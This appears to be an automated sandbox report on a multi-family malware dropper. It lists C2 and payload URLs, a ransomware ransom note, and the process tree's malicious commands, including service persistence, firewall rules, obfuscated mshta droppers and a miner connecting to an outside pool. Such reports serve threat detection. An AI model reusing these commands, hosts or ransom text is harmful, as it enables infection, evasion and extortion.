Overview

overview

10

Static

static

dridex

windows10_x64

10

Analysis

  • max time kernel
    146s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    05-11-2021 13:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    cc1ad41d82d19736724af8e5e0b4d26f3cb903ac185878510886948afbcb75ea.exe

  • Size

    338KB

  • MD5

    6b93dd63fcb946bc0b06c2890bff8a2f

  • SHA1

    342b4dafea65405ef8a3744f85591e81cf683564

  • SHA256

    cc1ad41d82d19736724af8e5e0b4d26f3cb903ac185878510886948afbcb75ea

  • SHA512

    07ef315b9bd38a626ee096466bc1b14a0d3bd761bdfc765dec14e945edf59129e38e57e71da09f682929583047ba5e5e5471a4142b9d0f13222c248d86cb69f4

Score
10/10
anchordnsarkeibazarloaderdjvuraccoonredlinesmokeloadertofseevidarxmrig10110551cb6d1b7211b77f96ff654c9904c9c8522f8a677234353463465177068dec62c1db2959619dca43e02fa46ad7bd6064008f84893fac8025c5bfbe688da7bcaf1820b04eadlovesuperstarbackdoordiscoverydropperevasioninfostealerloaderminerpersistenceransomwarespywarestealerthemidatrojan

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://hefahei60.top/

http://pipevai40.top/

http://nusurtal4f.net/

http://netomishnetojuk.net/

http://escalivrouter.net/

http://nick22doom4.net/

http://wrioshtivsio.su/

http://nusotiso4.su/

http://rickkhtovkka.biz/

http://palisotoliso.net/
rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

tofsee

C2

quadoil.ru

lakeflex.ru

Extracted

Family

redline

Botnet

SuperStar

C2

185.215.113.29:36224

Extracted

Family

redline

Botnet

23435346346

C2

93.115.20.139:28978

Extracted

Family

redline

Botnet

LOVE

C2

91.242.229.222:21475

Extracted

Family

redline

Botnet

101

C2

185.92.73.142:52097

Extracted

Family

raccoon

Botnet

1cb6d1b7211b77f96ff654c9904c9c8522f8a677

Attributes
  • url4cnc

    http://teleliver.top/hiioBlacklight1

    http://livetelive.top/hiioBlacklight1

    http://teleger.top/hiioBlacklight1

    http://telestrong.top/hiioBlacklight1

    http://tgrampro.top/hiioBlacklight1

    http://teleghost.top/hiioBlacklight1

    http://teleroom.top/hiioBlacklight1

    http://telemir.top/hiioBlacklight1

    http://teletelo.top/hiioBlacklight1

    https://t.me/hiioBlacklight1

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

8f84893fac8025c5bfbe688da7bcaf1820b04ead

Attributes
  • url4cnc

    http://teleliver.top/agrybirdsgamerept

    http://livetelive.top/agrybirdsgamerept

    http://teleger.top/agrybirdsgamerept

    http://telestrong.top/agrybirdsgamerept

    http://tgrampro.top/agrybirdsgamerept

    http://teleghost.top/agrybirdsgamerept

    http://teleroom.top/agrybirdsgamerept

    http://telemir.top/agrybirdsgamerept

    http://teletelo.top/agrybirdsgamerept

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

8dec62c1db2959619dca43e02fa46ad7bd606400

Attributes
  • url4cnc

    http://telegin.top/capibar

    http://ttmirror.top/capibar

    http://teletele.top/capibar

    http://telegalive.top/capibar

    http://toptelete.top/capibar

    http://telegraf.top/capibar

    https://t.me/capibar

rc4.plain
rc4.plain

Extracted

Family

vidar

Version

47.9

Botnet

1055

C2

https://mas.to/@kirpich

Attributes
  • profile_id

    1055

Extracted

Family

djvu

C2

http://pqkl.org/lancer/get.php

Attributes
  • extension

    .irfk

  • offline_id

    7HKlLI6NrOQGMaTs5PqjvV1UcZ3VOcIeyFiH3Wt1

  • payload_url

    http://kotob.top/dl/build2.exe

    http://pqkl.org/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-dFmA3YqXzs Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0346uSifke

rsa_pubkey.plain

Extracted

Family

vidar

Version

47.9

Botnet

706

C2

https://mas.to/@kirpich

Attributes
  • profile_id

    706

Extracted

Family

vidar

Version

47.9

Botnet

517

C2

https://mas.to/@kirpich

Attributes
  • profile_id

    517

Signatures

  • AnchorDNS Backdoor

    A backdoor which communicates with C2 through DNS, attributed to the creators of Trickbot and Bazar.

    backdooranchordns
  • Arkei

    Arkei is an infostealer written in C++.

    stealerarkei
  • Bazar Loader

    Detected loader normally used to deploy BazarBackdoor malware.

    loaderdropperbazarloader
  • Detected AnchorDNS Backdoor 1 IoCs

    Sample triggered yara rules associated with the AnchorDNS malware family.

    backdoor
  • Detected Djvu ransomware 5 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

    ransomwaredjvu
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 9 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Windows security bypass 2 TTPs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Arkei Stealer Payload 2 IoCs
    stealer
  • Bazar/Team9 Loader payload 1 IoCs
  • Core1 .NET packer 1 IoCs

    Detects packer/loader used by .NET malware.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Vidar Stealer 7 IoCs
    stealer
  • XMRig Miner Payload 3 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Downloads MZ/PE file
  • Executes dropped EXE 32 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 13 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 4 IoCs
    evasiontrojan
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
  • Suspicious use of SetThreadContext 12 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
    evasion
  • Kills process with taskkill 3 IoCs
    evasion
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cc1ad41d82d19736724af8e5e0b4d26f3cb903ac185878510886948afbcb75ea.exe
    "C:\Users\Admin\AppData\Local\Temp\cc1ad41d82d19736724af8e5e0b4d26f3cb903ac185878510886948afbcb75ea.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2828
    • C:\Users\Admin\AppData\Local\Temp\cc1ad41d82d19736724af8e5e0b4d26f3cb903ac185878510886948afbcb75ea.exe
      "C:\Users\Admin\AppData\Local\Temp\cc1ad41d82d19736724af8e5e0b4d26f3cb903ac185878510886948afbcb75ea.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:860
  • C:\Users\Admin\AppData\Local\Temp\2C1D.exe
    C:\Users\Admin\AppData\Local\Temp\2C1D.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3124
    • C:\Users\Admin\AppData\Local\Temp\2C1D.exe
      C:\Users\Admin\AppData\Local\Temp\2C1D.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:3544
  • C:\Users\Admin\AppData\Local\Temp\30F0.exe
    C:\Users\Admin\AppData\Local\Temp\30F0.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:3456
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\snilrvah\
      2⤵
        PID:1232
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\bgfdtzix.exe" C:\Windows\SysWOW64\snilrvah\
        2⤵
          PID:2968
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create snilrvah binPath= "C:\Windows\SysWOW64\snilrvah\bgfdtzix.exe /d\"C:\Users\Admin\AppData\Local\Temp\30F0.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:1304
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description snilrvah "wifi internet conection"
            2⤵
              PID:2304
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start snilrvah
              2⤵
                PID:984
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:3404
              • C:\Users\Admin\AppData\Local\Temp\36AE.exe
                C:\Users\Admin\AppData\Local\Temp\36AE.exe
                1⤵
                • Executes dropped EXE
                • Modifies registry class
                • Suspicious use of WriteProcessMemory
                PID:1960
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\ninth.vbs"
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1664
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\repudiations.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\repudiations.exe" -pdxlsyheckcidczbdkcuwyyfwgcsxxi
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:1320
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\mahzor.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\mahzor.exe"
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1708
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                        5⤵
                          PID:1052
                • C:\Users\Admin\AppData\Local\Temp\3BC0.exe
                  C:\Users\Admin\AppData\Local\Temp\3BC0.exe
                  1⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: MapViewOfSection
                  PID:376
                • C:\Users\Admin\AppData\Local\Temp\4863.exe
                  C:\Users\Admin\AppData\Local\Temp\4863.exe
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious use of WriteProcessMemory
                  PID:3060
                  • C:\Users\Admin\AppData\Local\Temp\4863.exe
                    C:\Users\Admin\AppData\Local\Temp\4863.exe
                    2⤵
                    • Executes dropped EXE
                    PID:3116
                • C:\Windows\SysWOW64\snilrvah\bgfdtzix.exe
                  C:\Windows\SysWOW64\snilrvah\bgfdtzix.exe /d"C:\Users\Admin\AppData\Local\Temp\30F0.exe"
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:2364
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe
                    2⤵
                    • Drops file in System32 directory
                    • Suspicious use of SetThreadContext
                    • Modifies data under HKEY_USERS
                    PID:3444
                    • C:\Windows\SysWOW64\svchost.exe
                      svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1056
                • C:\Windows\system32\regsvr32.exe
                  regsvr32 /s C:\Users\Admin\AppData\Local\Temp\4F59.dll
                  1⤵
                  • Loads dropped DLL
                  PID:3620
                • C:\Users\Admin\AppData\Local\Temp\5A67.exe
                  C:\Users\Admin\AppData\Local\Temp\5A67.exe
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2924
                • C:\Users\Admin\AppData\Local\Temp\6322.exe
                  C:\Users\Admin\AppData\Local\Temp\6322.exe
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3040
                • C:\Users\Admin\AppData\Local\Temp\712D.exe
                  C:\Users\Admin\AppData\Local\Temp\712D.exe
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:1416
                  • C:\Users\Admin\AppData\Local\Temp\712D.exe
                    C:\Users\Admin\AppData\Local\Temp\712D.exe
                    2⤵
                    • Executes dropped EXE
                    PID:3792
                • C:\Users\Admin\AppData\Local\Temp\77B6.exe
                  C:\Users\Admin\AppData\Local\Temp\77B6.exe
                  1⤵
                  • Executes dropped EXE
                  PID:2288
                • C:\Users\Admin\AppData\Local\Temp\85D0.exe
                  C:\Users\Admin\AppData\Local\Temp\85D0.exe
                  1⤵
                  • Executes dropped EXE
                  • Checks BIOS information in registry
                  • Checks whether UAC is enabled
                  • Suspicious use of SetThreadContext
                  PID:2828
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                    2⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1520
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2828 -s 492
                    2⤵
                    • Suspicious use of NtCreateProcessExOtherParentProcess
                    • Drops file in Windows directory
                    • Program crash
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2844
                • C:\Users\Admin\AppData\Local\Temp\93EA.exe
                  C:\Users\Admin\AppData\Local\Temp\93EA.exe
                  1⤵
                  • Executes dropped EXE
                  PID:1572
                • C:\Users\Admin\AppData\Local\Temp\9D03.exe
                  C:\Users\Admin\AppData\Local\Temp\9D03.exe
                  1⤵
                  • Executes dropped EXE
                  PID:3172
                  • C:\ProgramData\winupd.exe
                    "C:\ProgramData\winupd.exe"
                    2⤵
                    • Executes dropped EXE
                    • Checks BIOS information in registry
                    • Checks whether UAC is enabled
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    PID:3224
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-csrsrv.resources_31bf3856ad364e35_6.1.7601.17514_ru-ru_c920b87044297248" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-csrsrv.resources_31bf3856ad364e35_6.1.7601.17514_ru-ru_c920b87044297248" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-csrsrv.resources_31bf3856ad364e35_6.1.7601.17514_ru-ru_c920b87044297248" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
                      3⤵
                        PID:4360
                        • C:\Windows\SysWOW64\icacls.exe
                          icacls "C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-csrsrv.resources_31bf3856ad364e35_6.1.7601.17514_ru-ru_c920b87044297248" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"
                          4⤵
                          • Modifies file permissions
                          PID:4588
                        • C:\Windows\SysWOW64\icacls.exe
                          icacls "C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-csrsrv.resources_31bf3856ad364e35_6.1.7601.17514_ru-ru_c920b87044297248" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"
                          4⤵
                          • Modifies file permissions
                          PID:4740
                        • C:\Windows\SysWOW64\icacls.exe
                          icacls "C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-csrsrv.resources_31bf3856ad364e35_6.1.7601.17514_ru-ru_c920b87044297248" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
                          4⤵
                          • Modifies file permissions
                          PID:4844
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\9D03.exe" & exit
                      2⤵
                        PID:3176
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /t 5
                          3⤵
                          • Delays execution with timeout.exe
                          PID:828
                    • C:\Users\Admin\AppData\Local\Temp\AA24.exe
                      C:\Users\Admin\AppData\Local\Temp\AA24.exe
                      1⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:1044
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        #cmd
                        2⤵
                        • Loads dropped DLL
                        PID:1724
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1724 -s 1724
                          3⤵
                          • Program crash
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1240
                    • C:\Users\Admin\AppData\Local\Temp\814.exe
                      C:\Users\Admin\AppData\Local\Temp\814.exe
                      1⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Checks processor information in registry
                      PID:3172
                      • C:\Users\Admin\AppData\Local\Temp\814.exe
                        C:\Users\Admin\AppData\Local\Temp\814.exe
                        2⤵
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Modifies system certificate store
                        PID:4104
                        • C:\Windows\SysWOW64\icacls.exe
                          icacls "C:\Users\Admin\AppData\Local\38264a4b-8fea-4986-b44f-4b58623dad6e" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                          3⤵
                          • Modifies file permissions
                          PID:4200
                        • C:\Users\Admin\AppData\Local\Temp\814.exe
                          "C:\Users\Admin\AppData\Local\Temp\814.exe" --Admin IsNotAutoStart IsNotTask
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:3484
                          • C:\Users\Admin\AppData\Local\Temp\814.exe
                            "C:\Users\Admin\AppData\Local\Temp\814.exe" --Admin IsNotAutoStart IsNotTask
                            4⤵
                            • Executes dropped EXE
                            PID:4540
                            • C:\Users\Admin\AppData\Local\74937abb-23f5-43c0-b721-fe5a10edd629\build2.exe
                              "C:\Users\Admin\AppData\Local\74937abb-23f5-43c0-b721-fe5a10edd629\build2.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:4888
                              • C:\Users\Admin\AppData\Local\74937abb-23f5-43c0-b721-fe5a10edd629\build2.exe
                                "C:\Users\Admin\AppData\Local\74937abb-23f5-43c0-b721-fe5a10edd629\build2.exe"
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Checks processor information in registry
                                PID:4704
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\74937abb-23f5-43c0-b721-fe5a10edd629\build2.exe" & del C:\ProgramData\*.dll & exit
                                  7⤵
                                    PID:4148
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /im build2.exe /f
                                      8⤵
                                      • Kills process with taskkill
                                      PID:3224
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /t 6
                                      8⤵
                                      • Delays execution with timeout.exe
                                      PID:4592
                      • C:\Users\Admin\AppData\Local\Temp\1999.exe
                        C:\Users\Admin\AppData\Local\Temp\1999.exe
                        1⤵
                        • Executes dropped EXE
                        PID:4212
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\System32\mshta.exe" VbsCRIpT: cLOSe ( CREatEOBjEcT ( "wSCripT.SHEll").Run ( "C:\Windows\system32\cmd.exe /R copy /y ""C:\Users\Admin\AppData\Local\Temp\1999.exe"" l~3M.exe && stARt L~3M.exE -pSXXBZ8rl1hYiwDMM & iF """"== """" for %m iN ( ""C:\Users\Admin\AppData\Local\Temp\1999.exe"") do taskkill -f -IM ""%~nXm"" " , 0, truE) )
                          2⤵
                            PID:4264
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\system32\cmd.exe" /R copy /y "C:\Users\Admin\AppData\Local\Temp\1999.exe" l~3M.exe && stARt L~3M.exE -pSXXBZ8rl1hYiwDMM & iF ""== "" for %m iN ( "C:\Users\Admin\AppData\Local\Temp\1999.exe") do taskkill -f -IM "%~nXm"
                              3⤵
                                PID:4320
                                • C:\Users\Admin\AppData\Local\Temp\l~3M.exe
                                  L~3M.exE -pSXXBZ8rl1hYiwDMM
                                  4⤵
                                  • Executes dropped EXE
                                  PID:4560
                                  • C:\Windows\SysWOW64\mshta.exe
                                    "C:\Windows\System32\mshta.exe" VbsCRIpT: cLOSe ( CREatEOBjEcT ( "wSCripT.SHEll").Run ( "C:\Windows\system32\cmd.exe /R copy /y ""C:\Users\Admin\AppData\Local\Temp\l~3M.exe"" l~3M.exe && stARt L~3M.exE -pSXXBZ8rl1hYiwDMM & iF ""-pSXXBZ8rl1hYiwDMM ""== """" for %m iN ( ""C:\Users\Admin\AppData\Local\Temp\l~3M.exe"") do taskkill -f -IM ""%~nXm"" " , 0, truE) )
                                    5⤵
                                      PID:4624
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /R copy /y "C:\Users\Admin\AppData\Local\Temp\l~3M.exe" l~3M.exe && stARt L~3M.exE -pSXXBZ8rl1hYiwDMM & iF "-pSXXBZ8rl1hYiwDMM "== "" for %m iN ( "C:\Users\Admin\AppData\Local\Temp\l~3M.exe") do taskkill -f -IM "%~nXm"
                                        6⤵
                                          PID:4680
                                      • C:\Windows\SysWOW64\mshta.exe
                                        "C:\Windows\System32\mshta.exe" VBScRIpT: cloSE (CrEateobjECt ( "wScrIPt.Shell" ). run ( "Cmd /q /R ECHo | set /P = ""MZ"" > vg8dFdt.t6N & COPy /y /B vG8dFDT.t6N+ 0NvV.aro + CKILDR.~DW + KhfW~UuH.I+ tPZzi.Y + pBSv_L.W2+ Y1IRKS2.JUF 74mD.AK & STart msiexec /y .\74MD.Ak " ,0 , TRUe ))
                                        5⤵
                                          PID:5048
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /q /R ECHo | set /P = "MZ" > vg8dFdt.t6N & COPy /y /B vG8dFDT.t6N+ 0NvV.aro + CKILDR.~DW + KhfW~UuH.I+ tPZzi.Y + pBSv_L.W2+ Y1IRKS2.JUF 74mD.AK & STart msiexec /y .\74MD.Ak
                                            6⤵
                                              PID:5104
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /S /D /c" ECHo "
                                                7⤵
                                                  PID:4116
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>vg8dFdt.t6N"
                                                  7⤵
                                                    PID:2064
                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                    msiexec /y .\74MD.Ak
                                                    7⤵
                                                    • Loads dropped DLL
                                                    PID:4488
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill -f -IM "1999.exe"
                                              4⤵
                                              • Kills process with taskkill
                                              PID:4712
                                      • C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-csrsrv.resources_31bf3856ad364e35_6.1.7601.17514_ru-ru_c920b87044297248\WMVSDECD.exe
                                        C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-csrsrv.resources_31bf3856ad364e35_6.1.7601.17514_ru-ru_c920b87044297248\WMVSDECD.exe
                                        1⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:4408
                                      • C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-csrsrv.resources_31bf3856ad364e35_6.1.7601.17514_ru-ru_c920b87044297248\WMVSDECD.exe
                                        C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-csrsrv.resources_31bf3856ad364e35_6.1.7601.17514_ru-ru_c920b87044297248\WMVSDECD.exe
                                        1⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:4436
                                      • C:\Users\Admin\AppData\Local\Temp\28BD.exe
                                        C:\Users\Admin\AppData\Local\Temp\28BD.exe
                                        1⤵
                                        • Executes dropped EXE
                                        PID:4508
                                      • C:\Users\Admin\AppData\Local\Temp\3C75.exe
                                        C:\Users\Admin\AppData\Local\Temp\3C75.exe
                                        1⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Checks processor information in registry
                                        PID:4860
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c taskkill /im 3C75.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\3C75.exe" & del C:\ProgramData\*.dll & exit
                                          2⤵
                                            PID:4696
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /im 3C75.exe /f
                                              3⤵
                                              • Kills process with taskkill
                                              PID:3196
                                            • C:\Windows\SysWOW64\timeout.exe
                                              timeout /t 6
                                              3⤵
                                              • Delays execution with timeout.exe
                                              PID:4472
                                        • C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-csrsrv.resources_31bf3856ad364e35_6.1.7601.17514_ru-ru_c920b87044297248\WMVSDECD.exe
                                          C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-csrsrv.resources_31bf3856ad364e35_6.1.7601.17514_ru-ru_c920b87044297248\WMVSDECD.exe
                                          1⤵
                                            PID:4496

                                          Network

                                          MITRE ATT&CK Enterprise v6

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • memory/376-156-0x0000000000400000-0x00000000008F9000-memory.dmp

                                            Filesize

                                            5.0MB

                                            Download

                                          • memory/376-155-0x0000000000900000-0x0000000000A4A000-memory.dmp

                                            Filesize

                                            1.3MB

                                            Download

                                          • memory/376-153-0x0000000000B98000-0x0000000000BA8000-memory.dmp

                                            Filesize

                                            64KB

                                            Download

                                          • memory/860-117-0x0000000000400000-0x0000000000409000-memory.dmp

                                            Filesize

                                            36KB

                                            Download

                                          • memory/1044-325-0x000000001AF70000-0x000000001AF72000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1052-210-0x0000000004E70000-0x0000000005476000-memory.dmp

                                            Filesize

                                            6.0MB

                                            Download

                                          • memory/1052-197-0x0000000000400000-0x0000000000420000-memory.dmp

                                            Filesize

                                            128KB

                                            Download

                                          • memory/1056-253-0x00000000006F0000-0x00000000007E1000-memory.dmp

                                            Filesize

                                            964KB

                                            Download

                                          • memory/1056-260-0x00000000006F0000-0x00000000007E1000-memory.dmp

                                            Filesize

                                            964KB

                                            Download

                                          • memory/1416-259-0x0000000000A78000-0x0000000000AEF000-memory.dmp

                                            Filesize

                                            476KB

                                            Download

                                          • memory/1416-286-0x0000000002690000-0x0000000002700000-memory.dmp

                                            Filesize

                                            448KB

                                            Download

                                          • memory/1416-261-0x0000000002600000-0x0000000002683000-memory.dmp

                                            Filesize

                                            524KB

                                            Download

                                          • memory/1416-262-0x0000000000400000-0x0000000000961000-memory.dmp

                                            Filesize

                                            5.4MB

                                            Download

                                          • memory/1416-280-0x0000000002480000-0x00000000024E3000-memory.dmp

                                            Filesize

                                            396KB

                                            Download

                                          • memory/1520-312-0x0000000008C40000-0x0000000009246000-memory.dmp

                                            Filesize

                                            6.0MB

                                            Download

